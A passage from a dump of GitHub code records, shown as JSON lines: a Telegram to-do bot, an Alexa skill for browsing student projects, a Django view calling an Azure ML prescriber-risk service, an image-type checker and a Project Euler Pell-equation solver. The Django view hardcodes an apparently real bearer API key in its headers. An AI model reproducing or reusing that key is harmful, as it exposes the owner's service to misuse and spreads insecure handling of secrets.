message_id, date, task):\n todo = {\n \"_id\" : message_id,\n \"task\": task,\n \"date\": date\n }\n id_todo = self.todos[chat_id].insert_one(todo)\n log.info(\"insert id : \" + str(id_todo))\n return todo\n\n def give_add_todo(self, bot, update, args):\n now = datetime.now() # Current date\n chat_id = update.message.chat.id\n date = (now.year, now.month)\n self.current_shown_dates[chat_id] = [date, ' '.join(args)] # Saving the current date in a dict\n markup = create_calendar(now.year, now.month)\n bot.send_message(update.message.chat.id, \"Choisir une date\", reply_markup=markup)\n\n def todo_callback(self, bot, update):\n if update.callback_query.data == \"next-month\":\n self.next_month(bot, update)\n elif update.callback_query.data == \"previous-month\":\n self.previous_month(bot, update)\n elif update.callback_query.data == \"ignore\":\n bot.answer_callback_query(update.callback_query.id, text=\"\")\n else:\n self.choose_day(bot, update)\n\n def choose_day(self, bot, update):\n ma = re.match(\"calendar-day-([0-9]+)\", update.callback_query.data)\n if ma is not None:\n chat_id = update.callback_query.message.chat.id\n date = datetime.strptime(\n str(self.current_shown_dates[chat_id][0][0]) + str(self.current_shown_dates[chat_id][0][1]),\n 
'%Y%m').replace(day=int(ma.group(1)))\n            try:\n                todo = self.add_todo(update.callback_query.message.chat_id, update.callback_query.message.message_id, date, self.current_shown_dates[chat_id][1])\n            except DuplicateKeyError:\n                log.info(\"duplicate key for message_id : \" + str(update.callback_query.message.message_id))\n                # erase calendar\n                bot.edit_message_text(\"todo existant\",\n                                      update.callback_query.from_user.id, update.callback_query.message.message_id,\n                                      reply_markup=\"\")\n                return\n            log.info(\"add todo : \" + str(todo))\n            bot.edit_message_text(str(todo[\"date\"].strftime(\"%d/%m\")) + \" : \" + todo[\"task\"],\n                                  update.callback_query.from_user.id, update.callback_query.message.message_id,\n                                  reply_markup=\"\")\n\n    def previous_month(self, bot, update):\n        chat_id = update.callback_query.message.chat.id\n        saved_date = self.current_shown_dates.get(chat_id)[0]\n        if saved_date is not None:\n            year, month = saved_date\n            month -= 1\n            if month < 1:\n                month = 12\n                year -= 1\n            date = (year, month)\n            self.current_shown_dates[chat_id][0] = date\n            markup = create_calendar(year, month)\n            bot.edit_message_text(\"Choisir une date\", update.callback_query.from_user.id,\n                                  update.callback_query.message.message_id, reply_markup=markup)\n            bot.answer_callback_query(update.callback_query.id, text=\"\")\n        else:\n            # Do something to inform of the error\n            pass\n\n    def next_month(self, bot, update):\n        chat_id = update.callback_query.message.chat.id\n        saved_date = self.current_shown_dates.get(chat_id)[0]\n        if saved_date is not None:\n            year, month = saved_date\n            month += 1\n            if month > 12:\n                month = 1\n                year += 1\n            date = (year, month)\n            self.current_shown_dates[chat_id][0] = date\n            markup = create_calendar(year, month)\n            bot.edit_message_text(\"Please, choose a date\", update.callback_query.from_user.id,\n                                  update.callback_query.message.message_id, reply_markup=markup)\n            bot.answer_callback_query(update.callback_query.id, text=\"\")\n        else:\n            # Do something to inform of the error\n            pass\n\n    def give_todo(self, bot, update, args):\n        if len(args) == 0:\n            log.info(\"Give the todolist\")\n            bot.sendMessage(chat_id=update.message.chat_id, text=self.all_to_do_list(update.message.chat_id))\n        elif len(args) == 2 and args[0] == \"-d\":\n            log.info(\"Delete \" + args[1] + \" from the todolist\")\n            self.delete_todo(update.message.chat_id, args[1])\n        else:\n            log.info(\"Bad format command\")\n            bot.sendMessage(chat_id=update.message.chat_id, text=self.usage())\n","repo_name":"Anastadev/anastasia","sub_path":"anastasia/todolist.py","file_name":"todolist.py","file_ext":"py","file_size_in_byte":5656,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"}
{"seq_id":"544534812","text":"# -*- coding: utf-8 -*-\n\"\"\"Simple fact sample app.\"\"\"\n\nimport random\nimport logging\n\nfrom ask_sdk_core.skill_builder import SkillBuilder\nfrom ask_sdk_core.dispatch_components import (\n    AbstractRequestHandler, AbstractExceptionHandler,\n    AbstractRequestInterceptor, AbstractResponseInterceptor)\nfrom ask_sdk_core.utils import is_request_type, is_intent_name, get_slot_value, get_slot\nfrom ask_sdk_core.handler_input import HandlerInput\n\nfrom ask_sdk_model.ui import SimpleCard\nfrom ask_sdk_model import Response\nfrom ask_sdk_model.dialog import (\n    ElicitSlotDirective, DelegateDirective)\nfrom ask_sdk_model import (\n    Response, IntentRequest, DialogState, SlotConfirmationStatus, Slot)\nfrom ask_sdk_model.slu.entityresolution import StatusCode\nfrom ask_sdk_model.intent import Intent\nfrom enum import Enum\nimport os\nimport pyrebase\nimport 
requests\nimport random\n# =========================================================================================================================================\n# TODO: The items below this comment need your attention.\n# =========================================================================================================================================\nEXCEPTION_MESSAGE = \"Sorry. I cannot help you with that.\"\n\nLAUNCH_MESSAGE = \"Welcome to showcaser.\"\nGOODBYE_MESSAGE = \"Alright! Goodbye!\"\nREQUEST_COURSE_MESSAGE = \"Which course do you want?\"\nREQUEST_TAG_MESSAGE = \"What type of projects are you looking for?\"\nHELP_COURSE_MESSAGE = \"There is IMGD, IT, FI, ISF, and A3DA.\"\nHELP_TAG_MESSAGE = \"There are projects ranging from programming, to design.\"\n\n# =========================================================================================================================================\n# Editing anything below this line might break your skill.\n# =========================================================================================================================================\n\nsb = SkillBuilder()\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nconfig = {\n \"apiKey\" : os.getenv(\"apiKey\"),\n \"projectId\" : os.getenv(\"projectId\"),\n \"authDomain\" : os.getenv(\"authDomain\"),\n \"storageBucket\": os.getenv(\"storageBucket\"),\n \"databaseURL\": \"\",\n}\n\nfirebase = pyrebase.initialize_app(config)\nauth = firebase.auth()\n\nclass SessionManager:\n def __init__(self, *args, **kwargs):\n return super().__init__(*args, **kwargs)\n \n def set_session(self, handler_input):\n self.session = get_session(handler_input)\n \n def is_confirming_project_search(self):\n return self.session['expecting']['projectSearch'] is True\n \nsessionManager = SessionManager()\n\n\nclass SuggestionType(Enum):\n COURSE = \"course\"\n TAG = \"tag\"\n\n def __repr__(self):\n return self.value\n \n def __eq__(self, other):\n return other == self.value\n\n\ndef GeneratePayload(tag, course):\n payload = {\n \"title\": \"\",\n\t\"description\": \"\",\n\t\"tags\": [tag],\n\t\"course\": [course]\n }\n if tag == \"all\" or tag is None:\n payload[\"tags\"] = []\n if course == \"all\" or course is None:\n payload[\"course\"] = []\n\n return payload\ndef FormHeader(idToken):\n header = {\n 'Authorization' : 'Bearer ' + idToken,\n 'Content-Type' : 'application/json'\n }\n return header\n\ndef get_expecting_type(handler_input):\n session = get_session(handler_input)\n if session['expecting']['projectSearch'] is True:\n return \"PROJECT_SEARCH\"\n\n@sb.request_handler(can_handle_func = is_request_type(\"LaunchRequest\"))\ndef LaunchHandler(handler_input):\n user = auth.sign_in_with_email_and_password(os.getenv(\"firebase_email\"), os.getenv(\"firebase_password\"))\n idToken = user['idToken']\n session = get_session(handler_input)\n session['idToken'] = user['idToken']\n session['isRetrieving'] = False\n session['tag'] = None\n session['course'] = None\n session['fallbackCount'] = 0\n session['expecting'] = {\n 'projectSearch' : False,\n 'suggestion': False\n }\n session['suggestion'] = {\n 'type': \"\",\n 'value': \"\",\n 'count': 0\n }\n\n return elicit_slot(\"ProjectType\", \"RetrieveProjectsIntent\", handler_input, REQUEST_TAG_MESSAGE, LAUNCH_MESSAGE)\n\ndef get_resolved_value(slot):\n if slot is None:\n return None\n\n resolution = slot.resolutions.resolutions_per_authority[0]\n code = resolution.status.code\n if code == StatusCode.ER_SUCCESS_NO_MATCH:\n return 
None\n    elif code == StatusCode.ER_SUCCESS_MATCH:\n        value = resolution.values[0].value.name\n        logger.info(\"Value: {}, code: {}\".format(value, code))\n        return value\n\ndef get_session(handler_input):\n    return handler_input.attributes_manager.session_attributes\n\ndef elicit_slot(slot_name, intent_name, handler_input, message_body, suffix):\n    return handler_input.response_builder.speak(f\"{suffix} {message_body}\").add_directive(\n        ElicitSlotDirective(Intent(name=intent_name), slot_to_elicit=slot_name)\n    ).response\n\n\n@sb.request_handler(can_handle_func = is_intent_name(\"RetrieveProjectsIntent\"))\ndef GetTypeHandler(handler_input):\n    \"\"\" Handler for getting Project Type \"\"\"\n    tag = get_slot(handler_input, \"ProjectType\")\n    session = get_session(handler_input)\n    logger.info(\"ProjectType slot: {}\".format(tag))\n\n    if tag.value is None:\n        return handler_input.response_builder.speak(\n            \"Sorry I did not get that. What type of projects do you want?\").add_directive(\n            ElicitSlotDirective(slot_to_elicit=\"ProjectType\")\n        ).response\n    else:\n        session['tag'] = tag.value\n        return ProjectHandler(handler_input, \"\")\n    \n@sb.request_handler(can_handle_func = is_intent_name(\"GetCourseIntent\"))\ndef GetCourseHandler(handler_input):\n    \"\"\" Handler for getting Course \"\"\"\n    course_slot = get_slot(handler_input, \"Course\")\n    session = get_session(handler_input)\n    if course_slot.value is None or get_resolved_value(course_slot) is None:\n        return handler_input.response_builder.speak(\n            \"Sorry, I did not get that. What course do you want?\").add_directive(\n            ElicitSlotDirective(slot_to_elicit=\"Course\")\n        ).response\n    else:\n        value = get_resolved_value(course_slot)\n        session['course'] = value\n        return ProjectHandler(handler_input, \"\")\n    \n@sb.request_handler(can_handle_func = is_intent_name(\"CourseOnlyIntent\"))\ndef GetCourseOnlyHandler(handler_input):\n    return __GetCourseOnlyHandler(handler_input)\n\ndef __GetCourseOnlyHandler(handler_input):\n    session = get_session(handler_input)\n    course = get_resolved_value(get_slot(handler_input, \"Course\"))\n    response = requests.post(\"https://backend.showcasr.yadunut.com/live\", json=GeneratePayload(\"all\", course), headers=FormHeader(session['idToken']))\n    message = \"\"\n    if response.status_code == 401:\n        message = \"Request Error! Unauthorized\"\n    else:\n        session['course'] = None\n        json = response.json()\n        project_count = json['projectCount']\n        if course == \"A3DA\":\n            course = \"a. 3. d. a.\"\n        if project_count == 0:\n            message = f\"Projects from the {course} course was not found\"\n        else:\n            if \"all\" in course:\n                message = f'Here are all projects from all of the courses. There is a total of {project_count} project'\n            else:\n                message = f'Here are all projects from the {course} course. 
There is a total of {project_count} project'\n if project_count > 1:\n message += \"s\"\n message += \".\"\n message += \" Would you like to retrieve other kinds of projects?\"\n session['expecting']['projectSearch'] = True\n return handler_input.response_builder.speak(message).set_should_end_session(False).response\n\n\n\ndef ProjectHandler(handler_input, suffix):\n session = get_session(handler_input)\n tag, course = session['tag'], session['course']\n status = get_course_and_tag_status(handler_input)\n if status == NO_TAG_NO_COURSE:\n return handler_input.response_builder.speak(f\"{suffix} So, what kind of projects do you want?\").add_directive(\n ElicitSlotDirective(updated_intent=Intent(name=\"RetrieveProjectsIntent\"),slot_to_elicit=\"ProjectType\")\n ).response\n if status == HAS_TAG_NO_COURSE:\n message = f\"{suffix} So, from which course do you want {tag} projects from?\"\n return handler_input.response_builder.speak(\n message).add_directive(\n ElicitSlotDirective(updated_intent=Intent(name=\"GetCourseIntent\"),slot_to_elicit=\"Course\")\n ).response\n elif status == NO_TAG_HAS_COURSE:\n return __GetCourseOnlyHandler(handler_input)\n elif status == HAS_TAG_HAS_COURSE:\n message = \"\"\n response = requests.post(\"https://backend.showcasr.yadunut.com/live\", json=GeneratePayload(tag, course), headers=FormHeader(session['idToken']))\n if response.status_code == 401:\n message = \"Request Error! Unauthorized\"\n else:\n session['tag'] = None\n session['course'] = None\n json = response.json()\n project_count = json['projectCount']\n if course == \"A3DA\":\n course = \"a. 3. d. a.\"\n if project_count == 0:\n if \"all\" in course:\n message = f\"{tag} projects from all of the courses were not found\"\n else:\n message = f\"{tag} projects from the {course} course was not found\"\n else:\n if \"all\" in course:\n message = f'Here are {tag} projects from all of the courses. There is a total of {project_count} project'\n else:\n message = f'Here are {tag} projects from the {course} course. There is a total of {project_count} project'\n if project_count > 1:\n message += \"s\"\n message += \". 
Would you like to retrieve other kinds of projects?\"\n session['expecting']['projectSearch'] = True\n\n return handler_input.response_builder.speak(message).set_should_end_session(False).response\n\nNO_TAG_NO_COURSE = 0\nHAS_TAG_HAS_COURSE = 1\nNO_TAG_HAS_COURSE = 2\nHAS_TAG_NO_COURSE = 3\n\ndef get_course_and_tag_status(handler_input):\n session = get_session(handler_input)\n tag, course = session['tag'], session['course']\n if tag is not None and course is None:\n return HAS_TAG_NO_COURSE\n elif tag and course:\n return HAS_TAG_HAS_COURSE\n elif tag is None and course is not None:\n return NO_TAG_HAS_COURSE\n elif tag is None and course is None:\n return NO_TAG_NO_COURSE\n\n@sb.request_handler(can_handle_func = is_intent_name(\"DisplayCountIntent\"))\ndef GetDisplayCountHandler(handler_input):\n attr = handler_input.attributes_manager.session_attributes\n project_count = attr['projectCount']\n res = f'Total number of projects on display is {project_count}'\n\n return handler_input.response_builder.speak(res).set_should_end_session(False).response\n\n@sb.request_handler(can_handle_func = lambda x: (is_intent_name(\"AMAZON.StopIntent\")(x) or is_intent_name(\"AMAZON.CancelIntent\")(x)))\ndef StopHandler(handler_input):\n session = get_session(handler_input)\n status = get_course_and_tag_status(handler_input)\n if session['expecting']['suggestion']:\n session['expecting']['suggestion'] = False\n handler_input.attributes_manager.session_attributes = session\n return handler_input.response_builder.speak(\"Suggestion cancelled. What kind of projects would you like?\").set_should_end_session(False).response\n elif status == NO_TAG_NO_COURSE:\n return handler_input.response_builder.speak(GOODBYE_MESSAGE).set_should_end_session(True).response\n elif status == HAS_TAG_NO_COURSE or status == NO_TAG_HAS_COURSE:\n session['course'] = None\n session['tag'] = None\n return handler_input.response_builder.speak(\"Retrieving cancelled. What kind of projects would you like?\").set_should_end_session(False).response\n\n\n\n@sb.request_handler(can_handle_func = is_intent_name(\"SpecificCourseHelp\"))\ndef CourseHelpHandler(handler_input):\n course_slot = get_slot(handler_input, \"Course\")\n if course_slot.value is None:\n return ProjectHandler(handler_input, \"There is IMGD, IT, FI, ISF, and A3DA.\")\n course = get_resolved_value(course_slot)\n message = \"\"\n if course == \"ISF\":\n message = \"i. s. f. is about cybersecurity. \"\n elif course == \"FI\":\n message = \"f. i. is about finance. \"\n elif course == \"IT\":\n message = \"i. t. is about programming. \"\n elif course == \"A3DA\":\n message = \"a. three. d. a. is about animation. \"\n elif course == \"IMGD\":\n message = \"i. m. g. d. is about game design. \"\n return ProjectHandler(handler_input, message)\n\n\n@sb.request_handler(can_handle_func = is_intent_name(\"AMAZON.HelpIntent\"))\ndef HelpIntentHandler(handler_input):\n return __HelpIntentHandler(handler_input)\n \ndef __HelpIntentHandler(handler_input):\n \"\"\"Handler for Help Intent.\"\"\"\n session = get_session(handler_input)\n tag, course = session['tag'], session['course']\n status = get_course_and_tag_status(handler_input)\n if status == HAS_TAG_NO_COURSE:\n return elicit_slot(\"Course\", \"GetCourseIntent\", handler_input, REQUEST_COURSE_MESSAGE, \"There is IMGD, IT, FI, ISF, and a. 3. d. a. 
courses.\")\n else:\n return elicit_slot(\"ProjectType\", \"RetrieveProjectsIntent\", handler_input, REQUEST_TAG_MESSAGE, \"There are projects ranging from programming to design.\")\n \n\n@sb.request_handler(can_handle_func = is_intent_name(\"ListCoursesIntent\"))\ndef ListCoursesHandler(handler_input):\n return __ListCoursesHandler(handler_input)\n \ndef __ListCoursesHandler(handler_input):\n return ProjectHandler(handler_input, \"There is IMGD, IT, FI, ISF, and A3DA.\")\n\n@sb.request_handler(can_handle_func = is_intent_name(\"ListProjectsIntent\"))\ndef ListProjectsHandler(handler_input):\n return __ListProjectsHandler(handler_input)\n\ndef __ListProjectsHandler(handler_input):\n return ProjectHandler(handler_input, \"There are projects regarding gaming, programming or even design.\")\n\n\n\n@sb.request_handler(can_handle_func = is_intent_name(\"AutoSuggestionIntent\"))\ndef AutoSuggestionHandler(handler_input):\n session = get_session(handler_input)\n suggestionCount = session['suggestion']['count']\n if suggestionCount == 0:\n return __GetSuggestionHandler(handler_input)\n elif suggestionCount >= 1:\n return __GetSuggestionHandler(handler_input, auto_choose=True)\n\n\n@sb.request_handler(can_handle_func = is_intent_name(\"GetSuggestionIntent\"))\ndef GetSuggestionHandler(handler_input):\n return __GetSuggestionHandler(handler_input)\n\ndef __GetSuggestionHandler(handler_input, auto_choose=False, suffix=\"\"):\n session = get_session(handler_input)\n status = get_course_and_tag_status(handler_input)\n courses = [\"ISF\", \"IMGD\", \"FI\", \"IT\"]\n tags = [\"programming\", \"gaming\", \"design\"]\n chosen_course = random.choice(courses)\n chosen_tag = random.choice(tags)\n session['expecting']['suggestion'] = True\n\n session['suggestion']['count'] += 1\n if status == HAS_TAG_NO_COURSE:\n message = f\"{suffix} Would you like to search for {session['tag']} projects from the {chosen_course} course?\"\n if auto_choose:\n session['course'] = session['suggestion']['value']\n session['suggestion']['count'] = 0\n session['suggestion']['type'] = ''\n session['suggestion']['value'] = ''\n return ProjectHandler(handler_input, f\"Okay, I chose the {chosen_course} course for you.\")\n session['suggestion']['type'] = SuggestionType.COURSE.value\n session['suggestion']['value'] = f\"{chosen_course}\"\n return handler_input.response_builder.speak(message).set_should_end_session(False).response\n elif status == NO_TAG_NO_COURSE:\n message = f\"{suffix} Would you like to search for {chosen_tag} projects\"\n if auto_choose:\n session['tag'] = session['suggestion']['value']\n session['suggestion']['count'] = 0\n session['suggestion']['type'] = ''\n session['suggestion']['value'] = ''\n return ProjectHandler(handler_input, f\"Okay, I chose {chosen_tag} projects for you.\")\n session['suggestion']['type'] = SuggestionType.TAG.value\n session['suggestion']['value'] = f\"{chosen_tag}\"\n return handler_input.response_builder.speak(message).set_should_end_session(False).response\n\n@sb.request_handler(can_handle_func = is_intent_name(\"AMAZON.FallbackIntent\"))\ndef FallbackIntentHandler(handler_input):\n session = get_session(handler_input)\n fallbackCount = session['fallbackCount']\n if fallbackCount == 1:\n status = get_course_and_tag_status(handler_input)\n if status == HAS_TAG_NO_COURSE:\n return __ListCoursesHandler(handler_input)\n else:\n return __ListProjectsHandler(handler_input)\n elif fallbackCount == 2:\n return __GetSuggestionHandler(handler_input, suffix=\"I can't do that for you. 
However I can help suggest.\")\n elif fallbackCount >= 3:\n return handler_input.response_builder.speak(\"This is out of my domain. Goodbye\").response\n return __FallbackIntentHandler(handler_input, \"I did not get that.\")\n\ndef __FallbackIntentHandler(handler_input, suffix):\n \"\"\"Handler for Fallback Intent.\n AMAZON.FallbackIntent is only available in en-US locale.\n This handler will not be triggered except in that locale,\n so it is safe to deploy on any locale.\n \"\"\"\n session = get_session(handler_input)\n status = get_course_and_tag_status(handler_input)\n fallbackCount = session['fallbackCount']\n\n session['fallbackCount'] += 1\n handler_input.attributes_manager.session_attributes = session\n if status == HAS_TAG_NO_COURSE:\n return elicit_slot(\"Course\", \"GetCourseIntent\", handler_input, REQUEST_COURSE_MESSAGE, suffix)\n else:\n return handler_input.response_builder.speak(f\"{suffix} What kind of projects would you like?\").add_directive(\n ElicitSlotDirective(updated_intent=Intent(name=\"RetrieveProjectsIntent\"),slot_to_elicit=\"ProjectType\")\n ).response\n\n@sb.request_handler(can_handle_func = is_intent_name(\"AMAZON.YesIntent\"))\ndef YesHandler(handler_input):\n session = get_session(handler_input)\n if session['expecting']['projectSearch']:\n session['expecting']['projectSearch'] = False\n handler_input.attributes_manager.session_attributes = session\n return ProjectHandler(handler_input, \"\")\n elif session['expecting']['suggestion']:\n session['expecting']['suggestion'] = False\n if session['suggestion']['type'] == SuggestionType.COURSE.value:\n session['course'] = session['suggestion']['value']\n elif session['suggestion']['type'] == SuggestionType.TAG.value:\n session['tag'] = session['suggestion']['value']\n session['suggestion']['count'] = 0\n session['suggestion']['type'] = ''\n session['suggestion']['value'] = ''\n handler_input.attributes_manager.session_attributes = session\n return ProjectHandler(handler_input, \"\")\n else:\n return __FallbackIntentHandler(handler_input, \"I did not ask a yes or no question. Anyway, \")\n \n@sb.request_handler(can_handle_func = is_intent_name(\"AMAZON.NoIntent\"))\ndef NoHandler(handler_input):\n session = get_session(handler_input)\n if session['expecting']['projectSearch']:\n session['expecting']['projectSearch'] = False\n return handler_input.response_builder.speak(\"Okay, call me again if you need me. Goodbye.\").response\n elif session['expecting']['suggestion']:\n session['expecting']['suggestion'] = False\n if session['suggestion']['count'] >= 2:\n return handler_input.response_builder.speak(\"Okay, call me again if you need me. Goodbye.\").response\n else:\n return __GetSuggestionHandler(handler_input)\n else:\n return __FallbackIntentHandler(handler_input, \"I did not ask a yes or no question. 
Anyway, \")\n\n@sb.request_handler(can_handle_func = is_request_type(\"SessionEndedRequest\"))\ndef SessionEndedRequestHandler(handler_input):\n \"\"\"Handler for Session End.\"\"\"\n # type: (HandlerInput) -> Response\n logger.info(\"In SessionEndedRequestHandler\")\n\n logger.info(\"Session ended reason: {}\".format(\n handler_input.request_envelope.request.reason))\n return handler_input.response_builder.response\n\n\n# Exception Handler\n@sb.exception_handler(can_handle_func = lambda i, e: True)\ndef CatchAllExceptionHandler(handler_input, exception):\n \"\"\"Catch all exception handler, log exception and\n respond with custom message.\n \"\"\"\n # type: (HandlerInput, Exception) -> Response\n logger.info(\"In CatchAllExceptionHandler\")\n logger.error(exception, exc_info=True)\n\n handler_input.response_builder.speak(EXCEPTION_MESSAGE)\n\n return handler_input.response_builder.speak(f\"{exception}\").response\n\n@sb.global_response_interceptor()\ndef ResponseLogger(handler_input, response):\n \"\"\"Log the alexa responses.\"\"\"\n logger.debug(\"Alexa Response: {}\".format(response))\n\n@sb.global_request_interceptor()\ndef request_interceptor(handler_input):\n if is_request_type(\"IntentRequest\")(handler_input):\n sessionManager.set_session(handler_input)\n session = get_session(handler_input)\n if not (is_intent_name(\"AMAZON.YesIntent\")(handler_input) or is_intent_name(\"AMAZON.NoIntent\")(handler_input) or is_intent_name(\"AMAZON.StopIntent\")(handler_input) or is_intent_name(\"AMAZON.CancelIntent\")(handler_input)):\n if session['expecting']['projectSearch']:\n session['expecting']['projectSearch'] = False\n if session['expecting']['suggestion']:\n session['expecting']['suggestion'] = False\n if not (is_intent_name(\"AMAZON.YesIntent\")(handler_input) or is_intent_name(\"GetSuggestionIntent\")(handler_input) or is_intent_name(\"AutoSuggestionIntent\")(handler_input)):\n session['suggestion']['count'] = 0\n session['suggestion']['type'] = ''\n session['suggestion']['value'] = ''\n logger.info(\"Request received: {}\".format(handler_input.request_envelope.request))\n\n# Handler name that is used on AWS lambda\nlambda_handler = sb.lambda_handler()\n# sb.add_request_handler(ConfirmSuggestionHandler())","repo_name":"ravern/showcase","sub_path":"voice-interface/src/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":22666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"44196184290","text":"from django.conf import settings\nfrom django_mako_plus import view_function, jscontext\nfrom datetime import datetime, timezone\nfrom homepage import models as hmod\nfrom django.contrib.auth.models import User\nfrom django.db.models import Avg\nimport requests\nfrom django import forms\nimport json\nfrom decimal import Decimal\n\n@view_function\ndef process_request(request):\n\n if request.method == 'POST':\n form = PrescriberForm(request.POST)\n if form.is_valid():\n\n gender = form.cleaned_data.get('Gender')\n state = form.cleaned_data.get('State')\n credentials = form.cleaned_data.get('Credentials')\n specialty = form.cleaned_data.get('Specialty')\n totalPrescriptions = form.cleaned_data.get('TotalPrescriptions')\n\n\n url = \"https://ussouthcentral.services.azureml.net/workspaces/1280ec3736a7452db2ad1b4ffdf4fee8/services/904fb1ad86594947a63dd8ad9047933e/execute\"\n\n querystring = {\"api-version\":\"2.0\",\"details\":\"true\"}\n\n payload = \"{\\r\\n \\\"Inputs\\\": {\\r\\n \\\"Web input\\\": 
{\\r\\n \\\"ColumnNames\\\": [\\r\\n \\\"Gender\\\",\\r\\n \\\"State\\\",\\r\\n \\\"Credentials\\\",\\r\\n \\\"Specialty\\\",\\r\\n \\\"TotalPrescriptions\\\"\\r\\n ],\\r\\n \\\"Values\\\": [\\r\\n [\\r\\n \\\"\" + gender + \"\\\",\\r\\n \\\"\" + state + \"\\\",\\r\\n \\\"\" + credentials + \"\\\",\\r\\n \\\"\" + specialty + \"\\\",\\r\\n \\\"\"+ totalPrescriptions +\"\\\"\\r\\n ]\\r\\n ]\\r\\n }\\r\\n }\"\n headers = {\n 'Authorization': \"bearer o74oVphPyeiQPFgMzwpkm0k6AtgIqjWZQg1L9+myTJTgcLf+6WXSga7FRw+9myIYtwcvUZMlgqyn92MclBy4oA==\",\n 'Content-Type': \"application/json\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"27290ef0-98ba-41d6-8a4f-2389a1417b8f\"\n }\n\n response = requests.request(\"POST\", url, data=payload, headers=headers, params=querystring)\n\n start = str(response.text).find('Values\":[[\"0')\n s = str(response.text)[start:] \n end = str(response.text).find(']]')\n values = str(response.text)[start + 11 : end - 1]\n values = values.replace(\"\\\"\", \"\")\n valueList = values.split(',')\n \n chance = valueList[1]\n chance = Decimal(chance) * 100\n chance = round(chance, 2)\n\n atRisk = valueList[2]\n if atRisk == '0':\n atRisk = 'No'\n else:\n atRisk = 'Yes'\n else: \n chance = \"\"\n atRisk = \"\"\n \n else:\n form = PrescriberForm() \n chance = \"\"\n atRisk = \"\"\n\n context = {\n 'form': form,\n 'chance': chance,\n 'atRisk': atRisk,\n }\n\n return request.dmp.render('amIHighRisk.html', context)\n\n\nclass PrescriberForm(forms.Form):\n Gender = forms.CharField(label='Gender (M/F)', max_length=100)\n State = forms.CharField(label='State (ex. UT)', max_length=100)\n Credentials = forms.CharField(label='Credentials', max_length=100)\n Specialty = forms.CharField(label='Specialty', max_length=100)\n TotalPrescriptions = forms.CharField(label='Total Prescriptions', max_length=100)\n\n \n def clean(self):\n if self.cleaned_data.get('Gender') != 'M' and self.cleaned_data.get('Gender') != 'F': \n raise forms.ValidationError(\"Please enter gender as M or F\")\n\n if len(self.cleaned_data.get('State')) > 3: \n raise forms.ValidationError(\"Please enter a state abbreviation\")\n\n if int(self.cleaned_data.get('TotalPrescriptions')) < 0: \n raise forms.ValidationError(\"Please enter a valid number of Total Prescriptions\")\n\n return self.cleaned_data","repo_name":"mcmtrnt/intex2","sub_path":"homepage/views/amIHighRisk.py","file_name":"amIHighRisk.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19313439414","text":"from PIL import Image\nimport os\n\ndirnames = ['./train', './test']\n\nfor dirname in dirnames:\n print(\"check \" + dirname)\n filenames = os.listdir(dirname)\n for index, name in enumerate(filenames):\n filename = os.path.join(dirname, name)\n img = Image.open(filename)\n t = img.format.lower()\n if t != 'jpeg' and t != 'jpg' and t != 'png' and t != 'bmp':\n print(\"type error: \" + filename + \", \" + str(t))\n\n if len(img.size) != 2:\n print(\"shape error: \" + filename + \", \" + str(img.size))\n","repo_name":"xuzhezhaozhao/ai","sub_path":"datasets/leg-dataset/check_type.py","file_name":"check_type.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"73182909542","text":"# -*- coding: utf-8 -*-\n'''\nConsider quadratic Diophantine equations of the form:\n\nx^2 – Dy^2 = 1\n\nFor example, when D=13, the minimal solution in x is 649^2 – 13×180^2 = 
1.\n\nIt can be assumed that there are no solutions in positive integers when D is square.\n\nBy finding minimal solutions in x for D = {2, 3, 5, 6, 7}, we obtain the following:\n\n3^2 – 2×2^2 = 1\n2^2 – 3×1^2 = 1\n9^2 – 5×4^2 = 1\n5^2 – 6×2^2 = 1\n8^2 – 7×3^2 = 1\n\nHence, by considering minimal solutions in x for D ≤ 7, the largest x is obtained when D=5.\n\nFind the value of D ≤ 1000 in minimal solutions of x for which the largest value of x is obtained.\n\nhttp://mathworld.wolfram.com/PellEquation.html\nhttps://en.wikipedia.org/wiki/Pell%27s_equation\nhttps://en.wikipedia.org/wiki/Methods_of_computing_square_roots#Pell.27s_equation\n\n'''\nimport math\nimport sys\n\ndef isPerfectSquare(n):\n\tnsqrt = math.sqrt(n)\n\treturn nsqrt == math.floor(nsqrt)\n\ndef converg(n):\n\t#0\n\taz = math.floor(math.sqrt(n))\n\tp = az\n\tp2 = p\n\tq = 1\n\tq2 = q\n\tk = 0 # P\n\tl = 1 # Q\n\n\t#print(\"%s^2 - %s*%s^2 = %s\" % (p,n,q,p**2-n*q**2))\n\n\t#1\n\tk = az\n\tl = n - az**2\n\ta = math.floor( (az + k ) / l)\n\tp = az*a + 1\n\tq = a\n\n\twhile p*p - n*q*q != 1:\n\n\t\t#print(\"%s^2 - %s*%s^2 = %s\" % (p,n,q,p**2-n*q**2))\n\t\tptmp = p\n\t\tqtmp = q\n\n\t\t# start\n\t\tk = int(a * l - k)\n\t\tl = int((n - k*k) / l)\n\n\t\ta = int(math.floor( (az + k ) / l))\n\t\ttry:\n\t\t\tp = int(a*p+p2)\n\t\t\tq = int(a*q+q2)\n\t\texcept:\n\t\t\t#print(\"DID NOT WORK...\", p,q)\n\t\t\tbreak\n\n\n\t\t# ...\n\t\tp2 = ptmp\n\t\tq2 = qtmp\n\n\treturn p,q\n\nxlargest = 0\niindex = 0\nfor i in range(2, 1001):\n\tif isPerfectSquare(i):\n\t\tcontinue\n\tx,y = converg(i)\n\t#print(i, x, y)\n\tif x > xlargest:\n\t\tprint(\"NEW RECORD\", i, x)\n\t\txlargest = x\n\t\tiindex = i\n\nprint(iindex, xlargest)\n\n","repo_name":"elitan/euler","sub_path":"066/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
